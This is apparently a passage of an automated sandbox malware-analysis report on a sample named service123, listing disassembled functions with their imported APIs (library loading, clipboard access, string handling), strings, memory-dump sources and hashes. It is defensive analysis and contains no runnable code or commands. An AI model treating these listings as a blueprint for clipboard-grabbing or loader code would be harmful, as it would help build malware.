Instruction Fuzzy Hash: 4E018E75A492398FC704CA28C480A9AF7E5AB89315F0D5929E88587B14D238ECCBC7C2

Function 007B2BF0 Relevance: 12.7, APIs: 5, Strings: 2, Instructions: 407COMMON

Download Yara Rule

APIs

memset.MSVCRT ref: 007B2CC1

Strings

0, xrefs: 007B313E
o, xrefs: 007B30A8

Memory Dump Source

Source File: 00000005.00000002.2673593055.00000000007B1000.00000020.00000001.01000000.00000005.sdmp, Offset: 007B0000, based on PE: true

Associated: 00000005.00000002.2673579668.00000000007B0000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.2673608285.00000000007BA000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.2673622881.00000000007BE000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.2673637354.00000000007C1000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7b0000_service123.jbxd

Similarity

API ID: memset
String ID: 0$o
API String ID: 2221118986-4157579757
Opcode ID: 5a2ef28bdbcba101e83cdabdda6d05f5f0490c8583f277cf0ba504eb215e70c5
Instruction ID: f8ec15d965c169f974fc8f47ee6559c96d70ce37e67a10e7156301a1334fea07
Opcode Fuzzy Hash: 5a2ef28bdbcba101e83cdabdda6d05f5f0490c8583f277cf0ba504eb215e70c5
Instruction Fuzzy Hash: 8CF17171A052098FCB15CF69C4847DDBBF2BF89360F198229D854AB356D738ED86CB90

Function 6CA332C0 Relevance: 12.7, APIs: 5, Strings: 2, Instructions: 407COMMON

Download Yara Rule

APIs

memset.MSVCRT ref: 6CA33391

Strings

o, xrefs: 6CA33778
0, xrefs: 6CA3380E

Memory Dump Source

Source File: 00000005.00000002.2673773718.000000006CA21000.00000020.00000001.01000000.00000006.sdmp, Offset: 6CA20000, based on PE: true

Associated: 00000005.00000002.2673753776.000000006CA20000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2673885280.000000006CAFD000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2673901345.000000006CAFF000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2673934714.000000006CB48000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2673958255.000000006CB49000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2673972662.000000006CB4C000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_6ca20000_service123.jbxd

Similarity

API ID: memset
String ID: 0$o
API String ID: 2221118986-4157579757
Opcode ID: 00cb2d98c6e32ca29e5df2379417918a183b51e8976e900d5a5783c2af379635
Instruction ID: ab389776da965559095884a3777c8e87761d90d086148261057d231a56793e39
Opcode Fuzzy Hash: 00cb2d98c6e32ca29e5df2379417918a183b51e8976e900d5a5783c2af379635
Instruction Fuzzy Hash: 69F1A371A0A2148FCB01CF68C4946DDBBF2BF89364F19D219D898EB751D734E986CB90

Function 007B14E0 Relevance: 12.3, APIs: 4, Strings: 3, Instructions: 43libraryloaderCOMMON

Download Yara Rule

APIs

GetModuleHandleA.KERNEL32 ref: 007B14F0
LoadLibraryA.KERNEL32 ref: 007B1506
GetProcAddress.KERNEL32 ref: 007B1525
GetProcAddress.KERNEL32 ref: 007B1537

Strings

__deregister_frame_info, xrefs: 007B152C
__register_frame_info, xrefs: 007B151A
libgcc_s_dw2-1.dll, xrefs: 007B14E9, 007B14FF

Memory Dump Source

Source File: 00000005.00000002.2673593055.00000000007B1000.00000020.00000001.01000000.00000005.sdmp, Offset: 007B0000, based on PE: true

Associated: 00000005.00000002.2673579668.00000000007B0000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.2673608285.00000000007BA000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.2673622881.00000000007BE000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.2673637354.00000000007C1000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7b0000_service123.jbxd

Similarity

API ID: AddressProc$HandleLibraryLoadModule
String ID: __deregister_frame_info$__register_frame_info$libgcc_s_dw2-1.dll
API String ID: 384173800-1835852900
Opcode ID: 956a348b6253f0c47b68e1d663a77dd92321ec6954136f3d0a1bd654e571a21e
Instruction ID: a46ec91c342740803618b9287dd1e82063f903b79efbcb28b913287224de2735
Opcode Fuzzy Hash: 956a348b6253f0c47b68e1d663a77dd92321ec6954136f3d0a1bd654e571a21e
Instruction Fuzzy Hash: 9A011AB18092089BC3207F78A95979EBEE4AF84750F818539D98997200F77C88188BA7

Function 6CA213E0 Relevance: 12.3, APIs: 4, Strings: 3, Instructions: 43libraryloaderCOMMON

Download Yara Rule

APIs

GetModuleHandleA.KERNEL32 ref: 6CA213F0
LoadLibraryA.KERNEL32 ref: 6CA21406
GetProcAddress.KERNEL32 ref: 6CA21425
GetProcAddress.KERNEL32 ref: 6CA21437

Strings

__deregister_frame_info, xrefs: 6CA2142C
libgcc_s_dw2-1.dll, xrefs: 6CA213E9, 6CA213FF
__register_frame_info, xrefs: 6CA2141A

Memory Dump Source

Source File: 00000005.00000002.2673773718.000000006CA21000.00000020.00000001.01000000.00000006.sdmp, Offset: 6CA20000, based on PE: true

Associated: 00000005.00000002.2673753776.000000006CA20000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2673885280.000000006CAFD000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2673901345.000000006CAFF000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2673934714.000000006CB48000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2673958255.000000006CB49000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2673972662.000000006CB4C000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_6ca20000_service123.jbxd

Similarity

API ID: AddressProc$HandleLibraryLoadModule
String ID: __deregister_frame_info$__register_frame_info$libgcc_s_dw2-1.dll
API String ID: 384173800-1835852900
Opcode ID: b03e3d3167e4b73a230497b35dfa4c78cbc9fdb713f2499ff49855b748943090
Instruction ID: 1b749cfde18c393ec8e9765236b60c10b569f52dba2a4d391ca31ed0fe758b18
Opcode Fuzzy Hash: b03e3d3167e4b73a230497b35dfa4c78cbc9fdb713f2499ff49855b748943090
Instruction Fuzzy Hash: B801D8B29093609BC7007F7C9A0712D7FF4FA41214F05842DD59957714E731C884CBA3

Function 6CA473C0 Relevance: 12.2, APIs: 6, Strings: 2, Instructions: 237stringCOMMON

Download Yara Rule

APIs

strcmp.MSVCRT ref: 6CA47411
strlen.MSVCRT ref: 6CA4742B
strlen.MSVCRT ref: 6CA4747B
strlen.MSVCRT ref: 6CA474D8
strlen.MSVCRT ref: 6CA4752C

Strings

basic_string::append, xrefs: 6CA476CA, 6CA476D6, 6CA476E2, 6CA476EE
*, xrefs: 6CA47660

Memory Dump Source

Source File: 00000005.00000002.2673773718.000000006CA21000.00000020.00000001.01000000.00000006.sdmp, Offset: 6CA20000, based on PE: true

Associated: 00000005.00000002.2673753776.000000006CA20000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2673885280.000000006CAFD000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2673901345.000000006CAFF000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2673934714.000000006CB48000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2673958255.000000006CB49000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2673972662.000000006CB4C000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_6ca20000_service123.jbxd

Similarity

API ID: strlen$strcmp
String ID: *$basic_string::append
API String ID: 551667898-3732199748
Opcode ID: 4783c5f5aa4443ea995f971363c2e0917e6709c4c1248fc830a075a28c9bf3e6
Instruction ID: a3155de45a0c5b1339c26b2e47a5ca94ab117a28bfe141fcd6bada492082a54a
Opcode Fuzzy Hash: 4783c5f5aa4443ea995f971363c2e0917e6709c4c1248fc830a075a28c9bf3e6
Instruction Fuzzy Hash: 66A13C70A086118FD700EF68C18475EBBE2BF45308F55CA6DE4989F745DB35D88ACB92

Function 6CAC3DD0 Relevance: 12.2, APIs: 7, Strings: 1, Instructions: 233COMMON

Download Yara Rule

APIs

memmove.MSVCRT ref: 6CAC3E6F
memmove.MSVCRT(?,?,?,?,?,?,?,?,?,?,00000000,?,00000000,?,6CA5E9CE), ref: 6CAC3ED3
memmove.MSVCRT ref: 6CAC3F0B
memcpy.MSVCRT(?,?,?,?,?,?,?,?,?,?,00000000,?,00000000,?,6CA5E9CE), ref: 6CAC3F7A

Strings

basic_string::_M_replace, xrefs: 6CAC40FF

Memory Dump Source

Source File: 00000005.00000002.2673773718.000000006CA21000.00000020.00000001.01000000.00000006.sdmp, Offset: 6CA20000, based on PE: true

Associated: 00000005.00000002.2673753776.000000006CA20000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2673885280.000000006CAFD000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2673901345.000000006CAFF000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2673934714.000000006CB48000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2673958255.000000006CB49000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2673972662.000000006CB4C000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_6ca20000_service123.jbxd

Similarity

API ID: memmove$memcpy
String ID: basic_string::_M_replace
API String ID: 3033661859-2323331477
Opcode ID: bd6aa663aee15a07cbe6145882985471c1d0703fff622a38092018fce7049263
Instruction ID: 29a10a0348fbcfad07fbfeaf80cfba3e75631475b764824390ff976562a0e883
Opcode Fuzzy Hash: bd6aa663aee15a07cbe6145882985471c1d0703fff622a38092018fce7049263
Instruction Fuzzy Hash: EC910735A0A3558FC300DF68C1805AABBF1BF89748F14892DE5D99B724D774E985CB83

Function 6CA2E800 Relevance: 12.1, APIs: 8, Instructions: 89COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.2673773718.000000006CA21000.00000020.00000001.01000000.00000006.sdmp, Offset: 6CA20000, based on PE: true

Associated: 00000005.00000002.2673753776.000000006CA20000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2673885280.000000006CAFD000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2673901345.000000006CAFF000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2673934714.000000006CB48000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2673958255.000000006CB49000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2673972662.000000006CB4C000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_6ca20000_service123.jbxd

Similarity

API ID: strlen
String ID:
API String ID: 39653677-0
Opcode ID: 1884a794d3d441725b09e7e72905d71cc32fb0140713b8c23ce069bb11cd822c
Instruction ID: 2e71aa675c875aab6c76bb7b25d00d04ae455296f48840f20a06e255cfc7af0d
Opcode Fuzzy Hash: 1884a794d3d441725b09e7e72905d71cc32fb0140713b8c23ce069bb11cd822c
Instruction Fuzzy Hash: E621DA31944229CF9704CF39C58599AB7E6EB86316B1C8A15D4D487B14D338E8CF87D2

Function 6CA39BA6 Relevance: 12.1, APIs: 8, Instructions: 86clipboardCOMMON

Download Yara Rule

APIs

CloseHandle.KERNEL32 ref: 6CA39BA9
IsClipboardFormatAvailable.USER32 ref: 6CA39DDC
OpenClipboard.USER32 ref: 6CA39DF0

Memory Dump Source

Source File: 00000005.00000002.2673773718.000000006CA21000.00000020.00000001.01000000.00000006.sdmp, Offset: 6CA20000, based on PE: true

Associated: 00000005.00000002.2673753776.000000006CA20000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2673885280.000000006CAFD000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2673901345.000000006CAFF000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2673934714.000000006CB48000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2673958255.000000006CB49000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2673972662.000000006CB4C000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_6ca20000_service123.jbxd

Similarity

API ID: Clipboard$AvailableCloseFormatHandleOpen
String ID:
API String ID: 518195572-0
Opcode ID: a34079223e0009bb07d73d5204246dcfca51a87b8efa662969716c6f692fa8e6
Instruction ID: 7765bc37120e1b5296ce76c2c5a1d2a69aba4cf6212a02a50c2a64bd0cbbdede
Opcode Fuzzy Hash: a34079223e0009bb07d73d5204246dcfca51a87b8efa662969716c6f692fa8e6
Instruction Fuzzy Hash: AD2121B2B092108FEB00BF78D7491AEBBF5BB46249F045939D886D7644EB34D498CB53

Function 007B1E70 Relevance: 12.1, APIs: 8, Instructions: 84COMMON

Download Yara Rule

APIs

signal.MSVCRT ref: 007B1EAF
signal.MSVCRT ref: 007B1EF6
signal.MSVCRT ref: 007B1F0F
signal.MSVCRT ref: 007B1F36
signal.MSVCRT ref: 007B1F72
signal.MSVCRT ref: 007B1FBF
signal.MSVCRT ref: 007B1FD5
signal.MSVCRT ref: 007B1FEB

Memory Dump Source

Source File: 00000005.00000002.2673593055.00000000007B1000.00000020.00000001.01000000.00000005.sdmp, Offset: 007B0000, based on PE: true

Associated: 00000005.00000002.2673579668.00000000007B0000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.2673608285.00000000007BA000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.2673622881.00000000007BE000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.2673637354.00000000007C1000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7b0000_service123.jbxd

Similarity

API ID: signal
String ID:
API String ID: 1946981877-0
Opcode ID: c3eccaedfaec1de9929807129737ea12b07c46334dc0ade7ee0b25a829aab6e1
Instruction ID: 3a86f9b7f9619cbafcb6332045c8e8529f1ccc79494f92cfa600215342cae3cb
Opcode Fuzzy Hash: c3eccaedfaec1de9929807129737ea12b07c46334dc0ade7ee0b25a829aab6e1
Instruction Fuzzy Hash: 6D31F9B05192008EE7607FA4C9683BEB6E4EF45359FD58D0DE8C886281CB7DC888DB53

Function 007B4360 Relevance: 10.9, APIs: 3, Strings: 3, Instructions: 399COMMON

Download Yara Rule

APIs

_errno.MSVCRT ref: 007B4378

Strings

@, xrefs: 007B4647
NaN, xrefs: 007B4D3B
Inf, xrefs: 007B4E35, 007B4E4D

Memory Dump Source

Source File: 00000005.00000002.2673593055.00000000007B1000.00000020.00000001.01000000.00000005.sdmp, Offset: 007B0000, based on PE: true

Associated: 00000005.00000002.2673579668.00000000007B0000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.2673608285.00000000007BA000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.2673622881.00000000007BE000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.2673637354.00000000007C1000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7b0000_service123.jbxd

Similarity

API ID: _errno
String ID: @$Inf$NaN
API String ID: 2918714741-141429178
Opcode ID: 2eea2c972b535ba02e3d0584da346894812e433acf8b6f1bff8c530b325e1616
Instruction ID: ada39a9e87ad35b379c5834c1092b51cc1331167f68aca45f12fa6e009a26c6d
Opcode Fuzzy Hash: 2eea2c972b535ba02e3d0584da346894812e433acf8b6f1bff8c530b325e1616
Instruction Fuzzy Hash: 9AF1AD7560C3958BDB318F24C4907EBBBE1BF85314F158A2DE9D987282D7399906CB82

Function 6CA34A30 Relevance: 10.9, APIs: 3, Strings: 3, Instructions: 399COMMON

Download Yara Rule

APIs

_errno.MSVCRT ref: 6CA34A48

Strings

NaN, xrefs: 6CA3540B
@, xrefs: 6CA34D17
Inf, xrefs: 6CA35505, 6CA3551D

Memory Dump Source

Source File: 00000005.00000002.2673773718.000000006CA21000.00000020.00000001.01000000.00000006.sdmp, Offset: 6CA20000, based on PE: true

Associated: 00000005.00000002.2673753776.000000006CA20000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2673885280.000000006CAFD000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2673901345.000000006CAFF000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2673934714.000000006CB48000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2673958255.000000006CB49000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2673972662.000000006CB4C000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_6ca20000_service123.jbxd

Similarity

API ID: _errno
String ID: @$Inf$NaN
API String ID: 2918714741-141429178
Opcode ID: 0330ad8b51f27619f8808100e0e2fa84c032d4ff6361e313824ac9669a6690de
Instruction ID: ffd09e68b88eeb265a3c832f08c4f946f1fe8db16855902da6af4b4b5967ff83
Opcode Fuzzy Hash: 0330ad8b51f27619f8808100e0e2fa84c032d4ff6361e313824ac9669a6690de
Instruction Fuzzy Hash: FDF1B07160C3A58BD7218F28C46079BBFE2BBC5318F149A1DE9DCC7781D73599898B82

Function 007B3160 Relevance: 10.8, APIs: 4, Strings: 2, Instructions: 295COMMON

Download Yara Rule

Strings

0, xrefs: 007B34C6
@, xrefs: 007B342A

Memory Dump Source

Source File: 00000005.00000002.2673593055.00000000007B1000.00000020.00000001.01000000.00000005.sdmp, Offset: 007B0000, based on PE: true

Associated: 00000005.00000002.2673579668.00000000007B0000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.2673608285.00000000007BA000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.2673622881.00000000007BE000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.2673637354.00000000007C1000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7b0000_service123.jbxd

Similarity

API ID:
String ID: 0$@
API String ID: 0-1545510068
Opcode ID: e57f9d77be607eb7be2d65c7f691f863806e0b74bc638be5844c6890f5152d77
Instruction ID: 35945a6ac5d3bc53e78a1449dbb4bf1b64b4612cd4694951a740dbe7cbdfe5ab
Opcode Fuzzy Hash: e57f9d77be607eb7be2d65c7f691f863806e0b74bc638be5844c6890f5152d77
Instruction Fuzzy Hash: 35C14C71E046198BDB15CF6CC8847DEBBF1BF88314F198259E858AB385D738E985CB90

Function 6CA33830 Relevance: 10.8, APIs: 4, Strings: 2, Instructions: 295COMMON

Download Yara Rule

Strings

0, xrefs: 6CA33B96
@, xrefs: 6CA33AFA

Memory Dump Source

Source File: 00000005.00000002.2673773718.000000006CA21000.00000020.00000001.01000000.00000006.sdmp, Offset: 6CA20000, based on PE: true

Associated: 00000005.00000002.2673753776.000000006CA20000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2673885280.000000006CAFD000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2673901345.000000006CAFF000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2673934714.000000006CB48000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2673958255.000000006CB49000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2673972662.000000006CB4C000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_6ca20000_service123.jbxd

Similarity

API ID:
String ID: 0$@
API String ID: 0-1545510068
Opcode ID: 852fd2e7f322feda59a9287ec6fcafc659018383277beee50283a5623e34e20d
Instruction ID: 5c6b92a6f318ad88822816fcfb24ae45305cf269558552380a7b0b9113edb30b
Opcode Fuzzy Hash: 852fd2e7f322feda59a9287ec6fcafc659018383277beee50283a5623e34e20d
Instruction Fuzzy Hash: 9DC19171E0A2298FDB04CF6CC4A478DBBF1AF89314F199259D898EB745D335D886CB90

Function 6CA4B810 Relevance: 10.7, APIs: 5, Strings: 2, Instructions: 212stringCOMMON

Download Yara Rule

APIs

strlen.MSVCRT ref: 6CA4B836
memcmp.MSVCRT ref: 6CA4B85A
memcmp.MSVCRT ref: 6CA4B8CD
memcmp.MSVCRT ref: 6CA4B93F

Part of subcall function 6CAEADB0: strlen.MSVCRT ref: 6CAEADBE

memcmp.MSVCRT ref: 6CA4B9D7

Strings

basic_string::compare, xrefs: 6CA4B879, 6CA4B8EA, 6CA4B95D, 6CA4B9F6, 6CA4BA12
%s: __pos (which is %zu) > this->size() (which is %zu), xrefs: 6CA4B881, 6CA4B8F2, 6CA4B965, 6CA4B9FE, 6CA4BA1A

Memory Dump Source

Source File: 00000005.00000002.2673773718.000000006CA21000.00000020.00000001.01000000.00000006.sdmp, Offset: 6CA20000, based on PE: true

Associated: 00000005.00000002.2673753776.000000006CA20000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2673885280.000000006CAFD000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2673901345.000000006CAFF000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2673934714.000000006CB48000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2673958255.000000006CB49000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2673972662.000000006CB4C000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_6ca20000_service123.jbxd

Similarity

API ID: memcmp$strlen
String ID: %s: __pos (which is %zu) > this->size() (which is %zu)$basic_string::compare
API String ID: 3738950036-1697194757
Opcode ID: ec470bb121c92599de1c5f7d1f96ffccb23a611583b39bbdf3380a8b8b3ac040
Instruction ID: 1e87a1b204c24a332cfec09ab72d789b0c291bb73a2acd1b7c0a6299e1f05513
Opcode Fuzzy Hash: ec470bb121c92599de1c5f7d1f96ffccb23a611583b39bbdf3380a8b8b3ac040
Instruction Fuzzy Hash: 1C614772A093559FC3009F69DAC195EBBE5BF88644F158A2DE8C8C7711D371D884CB92

Function 6CA47710 Relevance: 10.7, APIs: 6, Strings: 1, Instructions: 211stringCOMMON

Download Yara Rule

APIs

Part of subcall function 6CA93320: memset.MSVCRT ref: 6CA93365

strcmp.MSVCRT ref: 6CA47771
strlen.MSVCRT ref: 6CA4778C
strlen.MSVCRT ref: 6CA477D3
strlen.MSVCRT ref: 6CA47844
strlen.MSVCRT ref: 6CA478B2

Strings

*, xrefs: 6CA47990

Memory Dump Source

Source File: 00000005.00000002.2673773718.000000006CA21000.00000020.00000001.01000000.00000006.sdmp, Offset: 6CA20000, based on PE: true

Associated: 00000005.00000002.2673753776.000000006CA20000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2673885280.000000006CAFD000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2673901345.000000006CAFF000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2673934714.000000006CB48000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2673958255.000000006CB49000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2673972662.000000006CB4C000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_6ca20000_service123.jbxd

Similarity

API ID: strlen$memsetstrcmp
String ID: *
API String ID: 3639840916-163128923
Opcode ID: 1fba69e67fd62fa0d4f8dae7f1779d67db52c3cb69e16afe3fb91224b379bcee
Instruction ID: f70fdbba46b0dadfaafd2bfe6d91102c51114c64f73f1e2f15a7552d8d45e89f
Opcode Fuzzy Hash: 1fba69e67fd62fa0d4f8dae7f1779d67db52c3cb69e16afe3fb91224b379bcee
Instruction Fuzzy Hash: CA8156B5A056108FDB00EF29C598A5EFBF5FF85308F05C5ADD8959B710C735A889CB82

Function 6CA2E8E0 Relevance: 10.7, APIs: 7, Instructions: 183COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.2673773718.000000006CA21000.00000020.00000001.01000000.00000006.sdmp, Offset: 6CA20000, based on PE: true

Associated: 00000005.00000002.2673753776.000000006CA20000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2673885280.000000006CAFD000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2673901345.000000006CAFF000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2673934714.000000006CB48000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2673958255.000000006CB49000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2673972662.000000006CB4C000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_6ca20000_service123.jbxd

Similarity

API ID: strlen
String ID:
API String ID: 39653677-0
Opcode ID: 6949fccd0a9c3e9d3ac8c5b45f2aac2a255c09ca815fc16772279bff97c29dd2
Instruction ID: f438cbbe6865557c443ea66a4e6e7a2f8fc0266efa2facb1b75e1c4f4dcfe24d
Opcode Fuzzy Hash: 6949fccd0a9c3e9d3ac8c5b45f2aac2a255c09ca815fc16772279bff97c29dd2
Instruction Fuzzy Hash: 2E5180705097288FC710CF69C080656F7E0BF8930AF4C8A5EE8989B751D338D9CACB96

Function 6CA2E340 Relevance: 10.6, APIs: 7, Instructions: 126synchronizationCOMMON

Download Yara Rule

APIs

CreateSemaphoreW.KERNEL32 ref: 6CA2E487
WaitForSingleObject.KERNEL32 ref: 6CA2E4C8

Memory Dump Source

Source File: 00000005.00000002.2673773718.000000006CA21000.00000020.00000001.01000000.00000006.sdmp, Offset: 6CA20000, based on PE: true

Associated: 00000005.00000002.2673753776.000000006CA20000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2673885280.000000006CAFD000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2673901345.000000006CAFF000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2673934714.000000006CB48000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2673958255.000000006CB49000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2673972662.000000006CB4C000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_6ca20000_service123.jbxd

Similarity

API ID: CreateObjectSemaphoreSingleWait
String ID:
API String ID: 1168595426-0
Opcode ID: 59c9f6e6bdb514faccc611ff513dc7b49a205400c5ef2e0185fc82029b7ebd54
Instruction ID: 4c30de16cb9e228c6eb074bb0f7c07a7e940dae1590ea35ac8d9b6a4eb67e391
Opcode Fuzzy Hash: 59c9f6e6bdb514faccc611ff513dc7b49a205400c5ef2e0185fc82029b7ebd54
Instruction Fuzzy Hash: 9A513A70B0A3218BDB14EF39C6843167BF9BB4630AF18852CD85597744D779E8C5CBA2

Function 6CA301F0 Relevance: 10.6, APIs: 7, Instructions: 65COMMON

Download Yara Rule

APIs

malloc.MSVCRT ref: 6CA30209
memcpy.MSVCRT(?,?,00000000,00000000,?,774CE010,6CA3038F), ref: 6CA3022D
malloc.MSVCRT ref: 6CA30247
memset.MSVCRT ref: 6CA30275
abort.MSVCRT(?,?,00000000,00000000,?,774CE010,6CA3038F), ref: 6CAF6D74
abort.MSVCRT(?,?,00000000,00000000,?,774CE010,6CA3038F), ref: 6CAF6D79
abort.MSVCRT(?,?,00000000,00000000,?,774CE010,6CA3038F), ref: 6CAF6D7E

Memory Dump Source

Source File: 00000005.00000002.2673773718.000000006CA21000.00000020.00000001.01000000.00000006.sdmp, Offset: 6CA20000, based on PE: true

Associated: 00000005.00000002.2673753776.000000006CA20000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2673885280.000000006CAFD000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2673901345.000000006CAFF000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2673934714.000000006CB48000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2673958255.000000006CB49000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2673972662.000000006CB4C000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_6ca20000_service123.jbxd

Similarity

API ID: abort$malloc$memcpymemset
String ID:
API String ID: 334492700-0
Opcode ID: e6d7780d917140ca2a5588e03258049156473324d9afcb76f04c1c6ed51653e4
